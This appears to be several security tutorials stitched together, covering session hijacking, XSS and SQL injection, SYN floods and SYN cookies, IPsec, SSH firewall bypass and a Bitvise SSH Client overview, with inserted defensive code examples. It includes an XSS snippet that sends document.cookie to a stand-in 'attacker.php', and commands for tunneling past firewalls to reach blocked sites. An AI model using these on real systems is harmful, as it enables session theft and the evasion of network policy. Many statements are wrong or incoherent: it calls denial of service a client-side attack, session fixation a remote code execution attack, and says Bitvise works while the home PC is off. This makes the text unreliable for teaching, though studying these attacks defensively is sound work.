Another type of session hijacking is known as a man-in-the-middle attack, where the attacker, using a sniffer, can observe the communication between devices and collect the data that is transmitted.

Different ways of session hijacking :

    There are many ways to do Session Hijacking. Some of them are given below –

    • In the above figure, it can be seen that the attacker captures the victim’s session ID to gain access to the server by using some packet sniffers.

    • Cross Site Scripting (XSS Attack)
      An attacker can also capture the victim’s session ID through an XSS attack using JavaScript. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker.

      <SCRIPT type="text/javascript">
      var adr = '../attacker.php?victim_cookie=' + escape(document.cookie);
      </SCRIPT>


    • IP Spoofing
      Spoofing is pretending to be someone else. This is a technique used to gain unauthorized access to a computer using the IP address of a trusted host. In implementing this technique, the attacker has to obtain the IP address of the client and inject his own packets, spoofed with the IP address of the client, into the TCP session, so as to fool the server into believing that it is communicating with the victim, i.e. the original host.
    • Blind Attack
      If the attacker is not able to sniff packets and guess the correct sequence number expected by the server, brute-force combinations of sequence numbers can be tried.

    Mitigation

    To defend a network against session hijacking, a defender has to implement security measures at both the application level and the network level. Network-level hijacks can be prevented by encrypting the packets so that the hijacker cannot decipher the packet headers to obtain any information that will aid in spoofing. This encryption can be provided by protocols such as IPsec, SSL, SSH etc. Internet Protocol Security (IPsec) has the ability to encrypt the packet using a shared key between the two parties involved in communication. IPsec runs in two modes: Transport and Tunnel.
    In Transport Mode only the data sent in the packet is encrypted, while in Tunnel Mode both packet headers and data are encrypted, so it is more restrictive.

    Session hijacking is a serious threat to networks and web applications, as most systems are vulnerable to it.


 A client-side attack is a security breach that happens on the client side. Examples include installing malware on your device or banking credentials being stolen by third-party sites. A common client-side attack is a denial of service attack, which floods a system with requests and prevents it from functioning properly. For example, if you tried to log into your bank’s website using an out-of-date browser and plugin, you would be denied access. Another common client-side attack is data manipulation, for example, changing your bank balance without your permission. On the other hand, a security breach on the client side should be prevented by using positive client-side security measures such as multifactor authentication and encryption. Ideally, computers should only be connected to trusted networks and devices with proper security patches installed. Client-side attacks are harder to prevent since they require access to your device, but can be mitigated by taking appropriate steps beforehand.

Structure of client-side attacks

 

Types of Client-Side Attacks: 

  • Content Spoofing: Content Spoofing is one of the common web security vulnerabilities. It allows the end user of the vulnerable web application to spoof or modify the actual content on the web page. The user might use the security loopholes on the website to inject the content that he/she wishes into the target website. When an application does not properly handle user-supplied data, an attacker can supply content to a web application, typically via a parameter value, that is reflected back to the user.
  • Cross-site scripting: In this type of attack, an attacker injects malicious codes into websites that are typically downloaded and displayed by a vulnerable browser. Cross-site scripting (XSS) is a computer security vulnerability typically found in web applications that enable attackers to inject client-side script into web pages viewed by other users.
  • Session Fixation Attack: A session fixation attack is a type of remote code execution attack which is used to exploit software designed with the web-server Session Management feature. When a website is running an HTTP server, the server’s session state information can be stolen and then retrieved by an attacker to take over the browser or use it for further attacks. There are many tools that can help you detect session fixation attacks in your organization in order to prevent future attacks. A Session fixation attack is also known as Session Fixation Vulnerability (SFV).

Detection:

The best way to mitigate client-side attacks is through system patching. System patching is the most basic and cost-effective method to lower the attack surface. It is important to keep up with patches and avoid vendor updates that patch vulnerabilities in software that are not relevant to the overall corporate environment. The best way to prevent client-side attacks is through a secure, strong password policy that dictates common passwords or patterns of many modern authentication technologies, including NTLM, MD4, DIGEST-MD5, and SHA1.

Countermeasures: 

Steps to take to prevent client-side attacks.

  • Install antivirus software, anti-spyware software, and firewall protection on all workstations, servers, and wireless devices.
  • Ensure the latest system software patches are applied regularly.
  • Maintain a complete backup system of all data on all systems; use a separate server, external hard drive, or network location to store backups that are no longer needed, and keep them off the system they were created on.
  • If a user is logging in from an unknown location or IP address, consider blocking access from those locations (access control lists).
  • Prevent unauthorized access to accounts.
  • Use strong passwords and avoid common passwords or patterns that can lead to vulnerabilities, like “Admin” or “12345”.
  • Limit login attempts (user lockout).

Cyber security has become an essential part of the digital world due to the rise in malicious attackers. Cyber security ensures the protection of data and systems from cyber attacks like Denial of Service attacks, Ransomware attacks, Virus attacks, etc. These attacks are made possible by finding vulnerabilities in the system, network, or any software. Different types of vulnerabilities can be found in any software or system if proper security measures were not taken, so we will compare the two most common vulnerabilities, XSS and SQL Injection, to understand the problem and their mitigation.

What is Cross-site Scripting(XSS)?

XSS (Cross-site scripting) can be understood as a web vulnerability that allows attackers to insert malicious JavaScript code into webpages of a vulnerable website. Once the client-side scripts are injected then the attacker can do many unethical tasks like stealing cookies, changing default settings, showing different types of popups, etc. With an XSS attack, an attacker can change the content of the website to defame it or redirect users to other websites.

Mitigation Techniques

  • Each and every developer must be aware of the XSS attacks and proper training should be given before doing development work.
  • Only allow trusted users’ input and set permissions for any external input through HTML.
  • Use escaping libraries for using user’s input like CSS escape, URL escape, HTML escape, etc.
  • To prevent cookie stealing, set the HttpOnly flag.
  • Use a security scanner on a regular basis to check for any new vulnerabilities.
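Two of the mitigations above in code: escaping user input before it is placed into HTML, and setting and auditing the HttpOnly flag so that script running in the page cannot read the session cookie through `document.cookie`. This is an added example, not code from the original page; the function names, the cookie name `sid` and the sample headers are constructed.

```python
import html
from http.cookies import SimpleCookie


def render_comment(author, text):
    """Escape user-supplied values so markup in them is displayed, not executed."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"


def session_cookie_header(session_id):
    """Build a Set-Cookie value for the session cookie with protective flags."""
    cookie = SimpleCookie()
    cookie["sid"] = session_id
    cookie["sid"]["httponly"] = True   # hidden from document.cookie
    cookie["sid"]["secure"] = True     # sent over HTTPS only
    cookie["sid"]["samesite"] = "Lax"
    cookie["sid"]["path"] = "/"
    return cookie["sid"].OutputString()


def missing_cookie_flags(set_cookie_value, required=("httponly", "secure")):
    """Return the required attributes absent from one Set-Cookie value."""
    parts = set_cookie_value.split(";")[1:]  # skip the name=value pair
    present = {p.strip().split("=", 1)[0].lower() for p in parts if p.strip()}
    return [flag for flag in required if flag not in present]


def audit_set_cookie_headers(values):
    """Map cookie name -> missing flags for every cookie that lacks one."""
    report = {}
    for value in values:
        name = value.split("=", 1)[0].strip()
        missing = missing_cookie_flags(value)
        if missing:
            report[name] = missing
    return report


if __name__ == "__main__":
    # Constructed Set-Cookie values as they might appear in captured responses.
    observed = [
        session_cookie_header("k3Jx0constructed"),
        "legacy_sid=abc123; Path=/",
        "theme=dark; Path=/; Secure",
    ]
    print(audit_set_cookie_headers(observed))
    print(render_comment("bob", "<script>steal()</script>"))
```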

What is SQL Injection?

SQL Injection can be understood as an attacking technique that uses SQL statements to interact with the database and make it behave abnormally. SQL statements can be injected using various fields like URLs, HTML form fields, cookies, etc. An attacker can insert malicious statements into input fields of a login form to query a database, if injected successfully then it can result in the compromise of the complete database with all the sensitive information like usernames, passwords, etc.

Mitigation Techniques

  •  Sanitize user input using an extra layer and check against common SQL syntax.
  • Instead of raw data input, use dropdowns or checklists for input and set input character limit.
  • Try to use parameterized statements and stored procedures whenever possible.
  • Scan and update applications at regular intervals.
  • Always use a firewall especially a web application firewall to make websites and web applications less vulnerable.
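The login-form case described above, with the string-built query beside a parameterized one. This is an added example, not code from the original page; the table layout, function names and the account in it are constructed, and SQLite stands in for whatever database the application uses.

```python
import hashlib
import hmac
import sqlite3


def _hash(password, salt=b"constructed-demo-salt"):
    # Fixed salt only to keep the demo short; use a random per-user salt in practice.
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000).hex()


def make_db():
    """Throwaway in-memory database with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("alice", _hash("correct horse")))
    return db


def login_vulnerable(db, name, password):
    """BEFORE: user input is concatenated into the SQL text itself."""
    query = ("SELECT name FROM users WHERE name = '" + name
             + "' AND pw_hash = '" + _hash(password) + "'")
    return db.execute(query).fetchone() is not None


def login_parameterized(db, name, password):
    """AFTER: input is bound as a value and can never become SQL syntax."""
    row = db.execute("SELECT pw_hash FROM users WHERE name = ?", (name,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], _hash(password))


if __name__ == "__main__":
    db = make_db()
    # Constructed input: the quote ends the string literal and "--" comments
    # out the password condition in the concatenated query.
    crafted = "alice' --"
    print("vulnerable   :", login_vulnerable(db, crafted, "wrong"))     # True
    print("parameterized:", login_parameterized(db, crafted, "wrong"))  # False
```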

Following is a table of differences between XSS and SQL Injection:

| Category | XSS | SQL Injection |
|---|---|---|
| Definition | It is a technique of injecting client-side scripts using JavaScript on users’ browsers to compromise the website. | It is a code injection technique that uses SQL statements to query the database in an abnormal manner to get information stored in the database. |
| Vulnerability Percentage | According to OWASP reports, around 65% of websites are vulnerable to XSS attacks. | According to Invicti Security reports, around 32% of government websites are vulnerable to SQL Injection. |
| Practice Websites | Google XSS Game, alert(1) to win, prompt(1) to win, etc. are some websites to practice XSS attacks. | hacksplaining.com, portswigger.net, acunetix, etc. are common SQL injection practicing websites. |
| Vulnerable Object | All input fields and URLs are vulnerable objects. | URLs interacting with the database, cookies storing data, input fields, etc. |
| Language Used | It uses JavaScript to write scripts for attacking. | It uses Structured Query Language for compromising the database. |
| First Attack | First XSS attack happened in 1999 where attackers maliciously injected the image tags. | First SQL Injection attack was documented in 1998. |
| Rating | It is the third most dangerous vulnerability. | It is the second most powerful vulnerability. |

Conclusion/Summary

In the above comparison, we found that both vulnerabilities are of high risk if found in any website or web application. It can lead to the compromise of users’ data along with sensitive information like bank accounts or health information. Hence developers must have knowledge of these vulnerabilities and implement the techniques to mitigate the attacks.

Before talking about SYN cookies and how they are used to prevent SYN flood attacks, let us first take a look at how TCP connections were established until the mid-1990s.

How TCP Connections Are Established:
A TCB (Transmission Control Block) is created when a TCP entity opens a TCP connection. A TCB contains the whole state of the connection. The state of the connection contains:

  1. Local sequence number.
  2. Sequence number sent by the remote client.

Until the mid-1990s, to avoid overflowing the entity’s memory with TCBs, there was a limit on the number of ‘half-open’ TCP connections (TCP connections in the SYN RCVD state), which was most commonly 100. So, a server could only have 100 ‘half-open’ TCP connections. The TCP entity would stop accepting any new SYN segments when the limit was reached.

A TCP implementation must maintain a Transmission Control Block (TCB) for every established TCP connection. A TCB must contain all information required to send and receive segments. They are as follows:

  1. Local IP address.
  2. Remote IP address.
  3. Local TCP port number.
  4. Remote TCP port number.
  5. Current state of the TCP FSM.
  6. Maximum segment size (MSS).

The following diagrams show the TCP connection process:

STEP 1: Client sends a SYN connection request to server

STEP 2: Server sends a SYN connection request and an acknowledgement to client

STEP 3: Client sends an acknowledgement to server

SYN Flood Attack:
A SYN flood attack is a type of denial-of-service attack during which an attacker rapidly initiates a TCP connection with a SYN request to a server and does not respond to the SYN+ACK from the server. The server has to spend resources (creating TCBs for the connection requests) waiting for half-opened connections. Since there was a limit on the number of ‘half-open’ TCP connections, the server will no longer accept any new connections. This will make the system unresponsive to legitimate traffic. The following steps show how it was carried out.

  1. Attacker would send 100s of SYN segments every second to a server.
  2. Attacker would not reply to any received SYN+ACK segments.
  3. Attacker would send these SYN segments with a different IP address from their own IP address to avoid being caught.
  4. Once a server entered the SYN RCVD state, it would remain in that state for several seconds, waiting for an ACK and not accepting any new, possibly genuine connections, thus being rendered unavailable.

Here are some diagrams depicting an SYN flood attack:

STEP 1: Client sends a SYN connection request to server

STEP 2: Server sends a SYN connection request and an acknowledgement to the client

STEP 3: Client does not respond with an ACK to complete the three-way handshake

STEP 4: Attacker creates 100 other half-open connections from various IP addresses

STEP 5: TCP buffer will be full at the server’s end and the server will be unable to accept any new connections

SYN flood attacks can be performed in three different ways:

  1. Direct attack-
    A SYN flood attack where the IP address of the attacker is not spoofed is called a direct attack. In a direct attack, the attacker uses a single source device with a real IP address; therefore, the attacker can be traced easily and the requests from the IP address of the malicious system can be blocked to prevent the attack.
  2. Spoofed attack-
    A SYN flood attack where the IP address of the attacker is spoofed on each SYN packet is called a spoofed attack. Even though the IP address is spoofed on each packet, the packets can be traced back to their source with the help of the Internet service providers (ISPs).
  3. Distributed attack-
    A SYN flood attack created using a botnet is called a distributed attack. The chances of tracing these attacks to their source are extremely low. The attacker may also spoof the IP address of each distributed device to make it more difficult to trace.

SYN Flood Attack Prevention:
SYN Flood attacks can be prevented in a number of different ways. Some approaches include:

  1. Increasing Backlog queue-
    There is a limit on the number of half-open connections on each operating system on a targeted device. One way to handle a high volume of SYN packets is to increase the maximum number of half-open connections that the operating system will allow. To increase the maximum backlog, the system must reserve additional memory resources to handle all the new requests. If the system does not have sufficient memory to handle the increased backlog queue size, the performance of the system will be affected, but that will be better than denial-of-service.
  2. Recycling the Oldest Half-Open TCP connection-
    In this strategy, the oldest half-open connection is overwritten once the backlog is filled. This strategy works only when connections can be fully established in less time than the backlog can be filled with malicious SYN packets. It fails when the volume of the attack is increased or if the backlog size is too small.
  3. SYN Cookies-
    SYN cookies is an IP Spoofing attack mitigation technique whereby the server replies to TCP SYN requests with crafted SYN-ACKs, without creating a new TCB for the TCP connection. A TCB is created for the respective TCP connection only when the client replies to this crafted response. This technique is used to protect the server’s resources from filling up under TCP SYN floods.

How SYN Cookies are used to prevent SYN Flood attacks:
SYN cookies solve this problem (the SYN flood attack) by using a function that takes some information from the client’s SYN packet and some information from the server side to calculate a random initial sequence number. Let us call this number y-1; y-1 is sent to the client in a SYN + ACK message. If an ACK packet is received with a sequence number y, then with the help of some packet header fields and some server-side information, a reverse function can verify that the acknowledgement number is valid. If it is valid, a TCB is created and a connection is established. If it is invalid, the connection is refused. The advantage of SYN cookies is that the server doesn’t have to create and store a TCB upon reception of the SYN segment.
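A minimal model of the scheme just described, as an added example that is not code from the original page or from any TCP stack. The HMAC construction, the 64-second time slot, the `Listener` class and all addresses are assumptions made for illustration; real implementations also encode the MSS in the cookie, which this sketch omits.

```python
import hashlib
import hmac
import socket
import struct

SECRET = b"constructed-demo-secret"  # the "server-side information" (assumption)
SLOT_SECONDS = 64                     # a cookie is accepted for at most two slots
MOD32 = 2 ** 32


def syn_cookie(src_ip, src_port, dst_ip, dst_port, client_isn, slot):
    """Server initial sequence number (the text's y-1) computed from the SYN."""
    msg = (socket.inet_aton(src_ip) + socket.inet_aton(dst_ip)
           + struct.pack("!HHII", src_port, dst_port, client_isn % MOD32, slot))
    digest = hmac.new(SECRET, msg, hashlib.sha256).digest()
    return int.from_bytes(digest[:4], "big")


def ack_is_valid(src_ip, src_port, dst_ip, dst_port, seq, ack, now):
    """Recompute the cookie from the ACK's own header fields and compare."""
    client_isn = (seq - 1) % MOD32  # the ACK's seq is the client ISN + 1
    claimed = (ack - 1) % MOD32     # the ACK acknowledges y, so y-1 is the cookie
    current = int(now) // SLOT_SECONDS
    for slot in (current, current - 1):
        if slot >= 0 and claimed == syn_cookie(
                src_ip, src_port, dst_ip, dst_port, client_isn, slot):
            return True
    return False


class Listener:
    """Toy server side: keeps no state for a SYN, allocates a TCB on a valid ACK."""

    def __init__(self, ip, port):
        self.ip, self.port = ip, port
        self.tcbs = {}

    def on_syn(self, src_ip, src_port, client_isn, now):
        # Nothing is stored here; the returned ISN goes out in the SYN+ACK.
        return syn_cookie(src_ip, src_port, self.ip, self.port,
                          client_isn, int(now) // SLOT_SECONDS)

    def on_ack(self, src_ip, src_port, seq, ack, now):
        if not ack_is_valid(src_ip, src_port, self.ip, self.port, seq, ack, now):
            return False  # connection refused, still no memory spent
        self.tcbs[(src_ip, src_port)] = {"state": "ESTABLISHED",
                                         "rcv_nxt": seq, "snd_nxt": ack}
        return True


if __name__ == "__main__":
    srv = Listener("192.0.2.10", 80)  # constructed documentation addresses
    for i in range(1000):             # SYNs that are never followed by an ACK
        srv.on_syn("198.51.100.%d" % (i % 250 + 1), 1024 + i, i, now=1000)
    print("TCBs after 1000 unanswered SYNs:", len(srv.tcbs))
    isn = srv.on_syn("203.0.113.5", 40000, 12345, now=1000)
    print("handshake completed:",
          srv.on_ack("203.0.113.5", 40000, 12346, (isn + 1) % MOD32, now=1010))
```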

IPSec (IP Security) architecture uses two protocols to secure the traffic or data flow. These protocols are ESP (Encapsulating Security Payload) and AH (Authentication Header). IPSec Architecture includes protocols, algorithms, DOI, and Key Management. All these components are very important in order to provide the three main services:

  • Confidentiality
  • Authentication
  • Integrity

IP Security Architecture: 
 
1. Architecture: Architecture or IP Security Architecture covers the general concepts, definitions, protocols, algorithms, and security requirements of IP Security technology. 

2. ESP Protocol: ESP (Encapsulating Security Payload) provides a confidentiality service. Encapsulating Security Payload is implemented in either of two ways:

  • ESP with optional Authentication.
  • ESP with Authentication.

Packet Format: 
 

  • Security Parameter Index(SPI): This parameter is used by Security Association. It is used to give a unique number to the connection built between the Client and Server.
  • Sequence Number: Unique Sequence numbers are allotted to every packet so that on the receiver side packets can be arranged properly.
  • Payload Data: Payload data means the actual data or the actual message. The Payload data is in an encrypted format to achieve confidentiality.
  • Padding: Extra bits of space are added to the original message in order to ensure confidentiality. Padding length is the size of the added bits of space in the original message.
  • Next Header: Next header means the next payload or next actual data.
  • Authentication Data: This field is optional in the ESP protocol packet format.

3. Encryption algorithm: The encryption algorithm is the document that describes various encryption algorithms used for Encapsulating Security Payload. 

4. AH Protocol: AH (Authentication Header) Protocol provides both Authentication and Integrity service. Authentication Header is implemented in one way only: Authentication along with Integrity. 
 
Authentication Header covers the packet format and general issues related to the use of AH for packet authentication and integrity. 

5. Authentication Algorithm: The authentication Algorithm contains the set of documents that describe the authentication algorithm used for AH and for the authentication option of ESP. 

6. DOI (Domain of Interpretation): DOI is the identifier that supports both AH and ESP protocols. It contains values needed for documentation related to each other. 

7. Key Management: Key Management contains the document that describes how the keys are exchanged between sender and receiver.

 SSH is a secure protocol that can be used to tunnel through firewalls. By using SSH, we can connect to a remote server and tunnel our traffic through the SSH connection. Firewalls are designed to protect networks from unauthorized access, but a firewall can also block legitimate traffic if not configured correctly. This can be a problem when we need to allow access to a specific application or service. One way to get around this issue is bypassing the firewall using ssh.

There are a few ways to bypass firewalls using SSH:

  • SSH Tunneling: This is the most common way to bypass firewalls. SSH tunneling creates a secure connection between two hosts over an insecure network. This connection can be used to tunnel traffic through the firewall.
  • SSH Port Forwarding: This is a less common way to bypass firewalls, but it can be useful in some cases. SSH port forwarding allows traffic to be forwarded from one port on the server to another port on the client.  This can be used to bypass firewalls that are blocking traffic on a specific port.
  • SSH SOCKS Proxy: This is another less common way to bypass firewalls. SSH SOCKS proxy allows traffic to be forwarded through the SSH connection. This can be used to bypass firewalls that are blocking traffic on a specific port.

Steps to Perform SSH Tunneling:

In order to bypass a firewall using SSH tunneling, we will need to set up an SSH server on a machine that is outside the firewall. We will then need to connect to this server using an SSH client and forward traffic from the client machine to the server machine. For example, let’s say that we want to bypass a firewall that is blocking all traffic to port 80. We could set up an SSH server on a machine that has port 80 open and then connect to this server using an SSH client. Once we are connected, we could then forward traffic from the local machine to port 80  on the server machine. This would allow us to bypass the firewall and access websites that are normally blocked.

Now we set up an SSH server on a machine that is outside the firewall.

Step 1: Install the SSH server software on the machine.

  • On Windows 11:
    • Navigate to Settings > Apps > Optional features and click on View features
    • Locate “OpenSSH server” feature, select it > check the checkbox, click Next, and then click Install.
  • On Windows 10:
    • Navigate to Settings > Apps > Apps & features > Optional features and click on Add a feature
    • Locate “OpenSSH server” feature, expand the feature > check the checkbox, and select Installation.

 

Step 2: Configure the SSH server to listen on port 80 and allow traffic to port 80 through the firewall.

On Windows: 

  • Navigate to Control Panel > System and Security > Windows Defender Firewall > Advanced Settings > Inbound Rules and add a new rule for port 80. 
  • Or execute the following PowerShell command as the Administrator:

New-NetFirewallRule -Name sshd -DisplayName 'OpenSSH SSH Server' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 80 -Program "C:\Windows\System32\OpenSSH\sshd.exe"

 

Step 3:  Start the SSH server

  • On Windows: Navigate to Control Panel > System and Security > Administrative Tools and open Services. Locate OpenSSH SSH  Server service and click Start the service.
  • Once the SSH server is up and running, and accessible remotely, the next step is to download an SSH client to the target machine. 

Steps to Connect the SSH Server and Forward Traffic:

Step 1: Install the SSH client software on the target machine: The OpenSSH client is included in Ubuntu Linux distributions by default. There are a few free SSH clients available for the Windows platform. The best one is PuTTY, which is available online on their site.

Step 2: Connect to the SSH server and forward traffic from the target machine to port 80 on the server machine. After starting PuTTY, fill in the following configuration details:

  • In the “Host Name” field, type the publicly accessible IP of the SSH server
  • Navigate to Connection > SSH > Tunnels
  • Add a new forwarded port:
    • Source Port = Target Port for Reverse Tunnelling
    • Destination = 127.0.0.1:[Target Port]
    • Direction = Remote
  • Click Add
  • Click Open to Start the SSH session

 

At this point, the target port will be mapped to the target remote SSH server. This means that clients on the remote network will be able to access the target PC as if it was on the remote network. Basically, this creates a private tunnel between two remote end-points, enabling remote administration of a fire-walled machine.

Perform SSH Port Forwarding:

Assuming we have SSH access to a remote server, we can use SSH port forwarding to bypass firewalls.  For example, let’s say we want to access a website that is blocked by a firewall. We can use SSH port forwarding to tunnel traffic from the local machine to the remote server, and then from the remote server to the website.

To do this, we would first SSH into the remote server. Then, we would use the following command to forward traffic from the local machine (port 8080) to the remote server (port 80):

ssh -L 8080:localhost:80 user@remote.server.com

Now, we can access the website by going to http://localhost:8080 in the web browser. The traffic will be tunneled through the SSH connection, and the remote server will act as a proxy.

We can also use SSH port forwarding to tunnel traffic from the remote server to the local machine. For example, let’s say we want to access a database that is only accessible from the remote server. We can use SSH port forwarding to tunnel traffic from the remote server to the local machine (port 3306) and then connect to the database using the local machine.

To do this, we would first SSH into the remote server. Then, we would use the following command to forward traffic from the remote server (port 3306) to the local machine (port 3306):

ssh -R 3306:localhost:3306 user@remote.server.com

Now, we can connect to the database using the local machine. The traffic will be tunneled through the SSH connection, and the local machine will act as a proxy.

Perform SSH SOCKS Proxy:

Assuming we have an SSH server running on a remote machine that we can access:

Step 1: On the local machine, open a terminal and run the following command:

ssh -D 9999 -f -C -q -N username@remotemachine

Step 2: This will establish a SOCKS proxy on port 9999 of the local machine.

Step 3: To use the proxy, configure the browser or other application to use a SOCKS proxy on localhost:9999.

Step 4: Browse the web; all traffic will be tunneled through the SSH connection.
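The -L, -R and -D command lines above differ in where the listening port opens and from which end of the tunnel the destination is dialled. As an added example (not from the original article), this Python code parses those options out of an ssh command line, for instance one taken from process-creation logs, and reports both; the function names and output fields are illustrative assumptions.

```python
import shlex

# OpenSSH client options that take an argument, per ssh(1).
ARG_OPTS = set("BbcDEeFIiJLlmOoPpQRSWw")

def describe(flag, spec):
    """Explain one -L/-R/-D spec: [bind_address:]port[:host:hostport].

    Assumes TCP specs without bracketed IPv6 addresses or Unix sockets.
    """
    parts = spec.split(":")
    dynamic = flag == "D" or (flag == "R" and len(parts) <= 2)
    listen = parts if dynamic else parts[:-2]
    if not 1 <= len(listen) <= 2 or not listen[-1].isdigit():
        return {"flag": flag, "error": "malformed spec: " + spec}
    bind = listen[0] if len(listen) == 2 else None  # None: loopback by default
    return {
        "flag": flag,
        # -R opens its listener on the SSH server; -L and -D on the client.
        "listener": "server" if flag == "R" else "client",
        "port": int(listen[-1]),
        # Static forwards name a fixed target; dynamic ones speak SOCKS.
        "target": None if dynamic else ":".join(parts[-2:]),
        # The target is dialled from the far end of the tunnel.
        "dialled_from": "client" if flag == "R" else "server",
        "non_loopback_bind": bind not in (None, "localhost", "127.0.0.1"),
    }

def forwards(cmdline):
    """Return the forwards requested by one ssh command line (getopt-style walk)."""
    tokens = shlex.split(cmdline)[1:]
    found, i = [], 0
    while i < len(tokens) and tokens[i].startswith("-") and tokens[i] != "--":
        flags, i = tokens[i][1:], i + 1
        for pos, flag in enumerate(flags):
            if flag not in ARG_OPTS:
                continue  # boolean flag such as -f, -C, -q, -N
            arg = flags[pos + 1:]
            if not arg and i < len(tokens):
                arg, i = tokens[i], i + 1  # argument is the next token
            if flag in "LRD":
                found.append(describe(flag, arg))
            break  # the rest of this token was the option's argument
    return found

if __name__ == "__main__":
    # The three command lines from the text above.
    for line in ("ssh -L 8080:localhost:80 user@remote.server.com",
                 "ssh -R 3306:localhost:3306 user@remote.server.com",
                 "ssh -D 9999 -f -C -q -N username@remotemachine"):
        print(line, "->", forwards(line))
```

For the -R line it reports a listener on the server whose connections are delivered to port 3306 on the client, the reverse of the -L case. A non-loopback bind address is flagged because it opens the forwarded port to other hosts on that network.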

Bitvise SSH Client uses a tunneling method to ensure that your data stays encrypted from machine to machine. You can create tunnels up to five hops deep, which means that someone with malicious intent could only access your data if they were on the same network as you are. Whenever you log in with Bitvise SSH Client, all traffic between your computer and the remote system is automatically secured by SSH. Every time you make an update, your files are immediately encrypted before they get there. In short, it is a reliable way of preventing unauthorized access when you’re away from your computer.

  • For many modern-day ethical hackers, the Bitvise SSH Client is an indispensable tool.
  • As such, it’s worth taking a moment to get acquainted with what this application can do and how you can use it. The SSH Client gives you access to your company computer system when you’re away from the office. 
  • It enables secure logins and file transfers over a network connection – which means that you can keep doing your job even if your home PC isn’t connected to the internet or is off for any other reason. 
  • It also has some advanced features, such as port forwarding and SFTP support for better data protection when transferring files.

Advantages:

  • Using the same software for both file transfers and secure remote access means that you won’t have to adjust different settings when you’re sending and receiving files. You also don’t have to maintain two separate connections, which would add unnecessary complexity. With Bitvise SSH Client, everything happens automatically.
  • You can log in to your computer securely, even if your home PC is turned off. So long as you keep your login information in a safe place, there will be no security issues.

What happens if you forget your login details? 

Installing the software on various devices could make this situation even worse since it means that multiple people have access to it. You can limit the number of people who have access to the Bitvise SSH Client by generating a personal installation code. This way, only people who know this code will be able to use it. The important thing here is that you must never share your personal installer with anyone else. If someone has access to your login credentials, they could use that information for malicious purposes – so even if you’re not worried about sensitive data getting out into the open, you should take steps to protect yourself from unauthorized access. Bitvise SSH Client can also help safeguard your information in the event of a security breach at one of your company’s locations.

Advantages:

  • One of the Bitvise SSH Client’s greatest strengths is its ability to help you stay connected with your business. 
  • You can manage all functions with a single login, which means that there’s no need to duplicate tasks between two different accounts. 
  • Your personal information is also secure and safe since every server connection has encryption. 
  • Bitvise SSH Client gives you the flexibility to access your company’s files from anywhere. So long as your system and network are properly configured and maintained, data transmissions don’t have to be initiated by a software program or by a person – they happen automatically.
  • Bitvise SSH Client applications are found on many companies’ computers – from small shops to large corporations. If you have access to one of these machines, then you too can benefit from the program’s features. 
  • Just about any version of Windows can run Bitvise SSH Client, though which operating system the program uses depends on what type of computer your company uses. Due to this fact, it’s highly advisable that you talk with your IT staff before installing the application.

Conclusion:

Bitvise SSH Client is a program that most companies use for file transfers and remote access. By being familiar with its function, you can better understand how this software has evolved over the years – as well as how it will continue to improve in the future. If you’re just getting into ethical hacking.